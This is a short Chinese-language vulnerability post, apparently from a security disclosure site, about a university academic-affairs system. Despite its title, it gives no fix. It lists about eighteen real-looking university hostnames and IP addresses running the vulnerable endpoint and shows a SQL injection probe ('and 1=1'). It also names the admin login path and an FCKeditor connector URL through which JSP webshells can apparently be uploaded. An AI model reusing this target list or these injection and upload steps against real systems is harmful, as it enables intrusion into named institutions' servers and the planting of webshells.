oracle 注入漏洞修复,某教务系统通用Oracle注入&任意文件上传

http://jwc.sau.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1081

http://211.82.200.116:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=244

http://jiaowu.dlufl.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=410

http://www1.hbjcxy.com/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=181

http://www.vtcsy.com:8080/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61

http://cityjw.dlut.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=163

http://121.22.25.5/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=270

http://218.7.95.52:800/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61

http://202.97.179.124:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1241

http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436

http://jwk.dlvtc.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=482

http://gz.syphu.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=301

http://jwgl.hrbcu.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=461

http://59.73.112.22/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=563

下面这几个没有发布新闻，所以没ID：

http://123.233.253.163:8080/index.jsp

http://218.8.131.152:8888/ACTIONSHOWFILES.APPPROCESS?mode=1

http://202.198.129.163/

http://221.211.54.6/ACTIONSHOWFILES.APPPROCESS?mode=1

以下是注入证明,例如“中国药科大学教务处”，

http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 and 1=1 正常

后台好像是：

http://edu.0day5.com/Main.jsp

#3.另外说到该系统的任意文件上传，不过有大多管理员还是聪明的删掉了，但还是有存在FckEditor编辑器的导致可以上传任意JSP脚本木马，编辑器漏洞地址：

http://edu.0day5.com/FCKeditor/editor/filemanager/browser/default/browser.html?connector=./connectors/jsp/connector

#4.有编辑器的地方就是跑马场！

​